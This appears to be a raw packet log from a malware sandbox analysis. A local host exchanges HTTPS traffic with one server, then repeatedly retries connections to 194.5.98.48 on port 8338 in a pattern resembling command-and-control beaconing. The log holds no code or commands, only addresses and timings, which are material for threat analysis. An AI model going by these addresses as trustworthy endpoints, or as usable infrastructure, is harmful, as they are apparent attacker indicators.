Oct 13, 2021 09:59:22.436317921 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.436369896 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.439570904 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.528394938 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.528692007 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.531434059 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.531594038 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.533046007 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.533185005 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.533207893 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.533441067 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.533489943 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.533497095 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.533502102 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.533508062 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.533524036 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.533560038 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.533653975 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.533720970 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.533781052 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.533843040 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.533904076 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.533968925 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.534029961 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.534116983 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.534168959 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.534231901 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.534297943 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.534360886 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.534429073 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.534493923 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.534550905 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.534642935 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.534682035 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.534769058 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.534809113 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.534873962 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.534934044 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.535001993 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.535089016 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.536712885 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.542038918 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.542067051 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.542083979 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.542089939 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.542243958 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.542526007 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.542623997 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.542625904 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.542639017 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.542680025 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.542716980 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.542773008 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.542807102 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.542865038 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.542912960 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.542980909 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.543009996 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.543065071 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.572125912 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.572149038 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.627748013 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.627887011 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.630327940 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.630357027 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.630476952 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.630536079 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.633075953 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.640424013 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.642076015 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.642172098 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.643573999 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.643599033 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.643620014 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.643624067 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.643625975 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.643631935 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.643635035 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.643637896 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.643697977 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.643726110 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.643856049 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.643928051 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.643989086 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.644052029 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.644493103 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.644512892 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.644521952 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.644525051 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.644526958 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.644529104 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.644531012 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.644531012 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.644562960 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.644571066 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.644588947 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.644599915 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.644656897 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.644711971 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.644722939 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.644730091 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.644747972 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.644757032 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.644793987 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.644859076 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.644951105 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.645010948 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.645049095 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.645103931 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.645143032 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.645196915 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.645239115 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.645303965 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.645344973 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.645407915 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.645445108 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.645508051 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.645539999 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.645597935 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.645642996 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.645698071 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.645739079 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.645801067 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.645836115 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.645895958 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.645930052 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.645986080 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.646027088 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.646087885 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.646127939 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.646190882 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.646226883 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.646290064 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.655020952 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.746323109 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.748194933 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.749701023 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.749713898 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.752545118 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.752697945 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.752882004 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.753009081 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.822612047 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.822741985 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.822823048 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.822827101 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.822838068 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.822844028 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.822909117 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.823059082 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.831298113 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.831434965 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.831446886 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.831459999 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.831511021 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.831537962 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.831609964 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.831640959 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.831712008 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.831738949 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.831793070 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.831813097 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.831835985 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.831908941 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.831933022 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.832000971 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.832034111 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.832104921 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.832134962 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.832205057 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.832232952 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.832305908 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.832329988 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.832401037 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.832428932 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.832499027 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.832525015 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.832592964 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.832619905 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.832690954 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.832715988 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.832797050 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.832813025 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.832882881 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.832910061 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.832979918 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.833173990 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.833268881 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.833280087 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.833378077 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.833477020 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.833549023 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.833571911 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.833646059 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.833672047 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.833977938 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.833988905 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.834120035 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.834126949 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.834150076 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.834197044 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.834207058 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.834260941 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.834269047 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.834316015 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.834347010 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.834355116 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.834372997 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.834377050 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.834434986 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.834444046 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.834515095 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.834521055 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.834594965 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.834603071 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.834698915 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.834705114 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.834790945 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.834799051 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.834871054 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.834877014 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.834952116 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.834959984 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.835051060 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.835057974 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.835155010 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.835165977 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.836082935 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.836100101 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.836216927 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.836227894 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.837632895 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.838342905 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.839946032 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.841212034 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.841321945 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.841325045 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.841326952 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.842669010 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.843051910 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.843070984 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.843130112 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.843415976 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.873565912 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.902533054 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.902565002 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:23.866491079 CEST	49165	80	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:47.402065992 CEST	49167	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 09:59:47.443866968 CEST	8338	49167	194.5.98.48	192.168.2.22
Oct 13, 2021 09:59:47.951963902 CEST	49167	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 09:59:47.993804932 CEST	8338	49167	194.5.98.48	192.168.2.22
Oct 13, 2021 09:59:48.512577057 CEST	49167	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 09:59:48.554356098 CEST	8338	49167	194.5.98.48	192.168.2.22
Oct 13, 2021 09:59:52.889058113 CEST	49168	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 09:59:52.931267977 CEST	8338	49168	194.5.98.48	192.168.2.22
Oct 13, 2021 09:59:53.440355062 CEST	49168	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 09:59:53.482795000 CEST	8338	49168	194.5.98.48	192.168.2.22
Oct 13, 2021 09:59:54.051212072 CEST	49168	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 09:59:54.093524933 CEST	8338	49168	194.5.98.48	192.168.2.22
Oct 13, 2021 09:59:58.168010950 CEST	49169	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 09:59:58.209976912 CEST	8338	49169	194.5.98.48	192.168.2.22
Oct 13, 2021 09:59:58.715907097 CEST	49169	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 09:59:58.757663012 CEST	8338	49169	194.5.98.48	192.168.2.22
Oct 13, 2021 09:59:59.262031078 CEST	49169	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 09:59:59.303946972 CEST	8338	49169	194.5.98.48	192.168.2.22
Oct 13, 2021 10:00:03.304702044 CEST	49170	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 10:00:03.346854925 CEST	8338	49170	194.5.98.48	192.168.2.22
Oct 13, 2021 10:00:03.848859072 CEST	49170	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 10:00:03.891011000 CEST	8338	49170	194.5.98.48	192.168.2.22
Oct 13, 2021 10:00:04.395011902 CEST	49170	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 10:00:04.437233925 CEST	8338	49170	194.5.98.48	192.168.2.22
Oct 13, 2021 10:00:08.460031986 CEST	49171	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 10:00:08.523962021 CEST	8338	49171	194.5.98.48	192.168.2.22
Oct 13, 2021 10:00:09.028614998 CEST	49171	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 10:00:09.071007967 CEST	8338	49171	194.5.98.48	192.168.2.22
Oct 13, 2021 10:00:09.574604988 CEST	49171	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 10:00:09.618448973 CEST	8338	49171	194.5.98.48	192.168.2.22
Oct 13, 2021 10:00:13.617917061 CEST	49172	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 10:00:13.660348892 CEST	8338	49172	194.5.98.48	192.168.2.22
Oct 13, 2021 10:00:14.177031040 CEST	49172	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 10:00:14.221671104 CEST	8338	49172	194.5.98.48	192.168.2.22
Oct 13, 2021 10:00:14.723088026 CEST	49172	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 10:00:14.765324116 CEST	8338	49172	194.5.98.48	192.168.2.22
Oct 13, 2021 10:00:18.815205097 CEST	49173	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 10:00:18.858319044 CEST	8338	49173	194.5.98.48	192.168.2.22
Oct 13, 2021 10:00:19.372370958 CEST	49173	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 10:00:19.414520025 CEST	8338	49173	194.5.98.48	192.168.2.22
Oct 13, 2021 10:00:19.933912992 CEST	49173	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 10:00:19.976007938 CEST	8338	49173	194.5.98.48	192.168.2.22
Oct 13, 2021 10:00:24.157327890 CEST	49174	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 10:00:24.199531078 CEST	8338	49174	194.5.98.48	192.168.2.22
Oct 13, 2021 10:00:24.708019018 CEST	49174	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 10:00:24.750334024 CEST	8338	49174	194.5.98.48	192.168.2.22
Oct 13, 2021 10:00:25.253984928 CEST	49174	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 10:00:25.296988964 CEST	8338	49174	194.5.98.48	192.168.2.22
Oct 13, 2021 10:00:29.358335972 CEST	49175	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 10:00:29.402411938 CEST	8338	49175	194.5.98.48	192.168.2.22
Oct 13, 2021 10:00:29.903193951 CEST	49175	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 10:00:29.945116043 CEST	8338	49175	194.5.98.48	192.168.2.22
Oct 13, 2021 10:00:30.449515104 CEST	49175	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 10:00:30.492897987 CEST	8338	49175	194.5.98.48	192.168.2.22
Oct 13, 2021 10:00:34.492163897 CEST	49176	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 10:00:34.538656950 CEST	8338	49176	194.5.98.48	192.168.2.22
Oct 13, 2021 10:00:35.051657915 CEST	49176	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 10:00:35.095479012 CEST	8338	49176	194.5.98.48	192.168.2.22
Oct 13, 2021 10:00:35.597656012 CEST	49176	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 10:00:35.640878916 CEST	8338	49176	194.5.98.48	192.168.2.22
Oct 13, 2021 10:00:39.640954971 CEST	49177	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 10:00:39.684106112 CEST	8338	49177	194.5.98.48	192.168.2.22
Oct 13, 2021 10:00:40.184539080 CEST	49177	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 10:00:40.227699995 CEST	8338	49177	194.5.98.48	192.168.2.22
Oct 13, 2021 10:00:40.730698109 CEST	49177	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 10:00:40.774363041 CEST	8338	49177	194.5.98.48	192.168.2.22
Oct 13, 2021 10:00:44.773170948 CEST	49178	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 10:00:44.816382885 CEST	8338	49178	194.5.98.48	192.168.2.22
Oct 13, 2021 10:00:45.332950115 CEST	49178	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 10:00:45.376101971 CEST	8338	49178	194.5.98.48	192.168.2.22
Oct 13, 2021 10:00:45.894678116 CEST	49178	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 10:00:45.940093040 CEST	8338	49178	194.5.98.48	192.168.2.22
Oct 13, 2021 10:00:50.363760948 CEST	49179	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 10:00:50.407035112 CEST	8338	49179	194.5.98.48	192.168.2.22
Oct 13, 2021 10:00:50.918234110 CEST	49179	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 10:00:50.962197065 CEST	8338	49179	194.5.98.48	192.168.2.22
Oct 13, 2021 10:00:51.479875088 CEST	49179	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 10:00:51.523070097 CEST	8338	49179	194.5.98.48	192.168.2.22
Oct 13, 2021 10:00:55.567550898 CEST	49180	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 10:00:55.610650063 CEST	8338	49180	194.5.98.48	192.168.2.22
Oct 13, 2021 10:00:56.113523960 CEST	49180	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 10:00:56.156723022 CEST	8338	49180	194.5.98.48	192.168.2.22
Oct 13, 2021 10:00:56.659497976 CEST	49180	8338	192.168.2.22	194.5.98.48
Oct 13, 2021 10:00:56.702579975 CEST	8338	49180	194.5.98.48	192.168.2.22
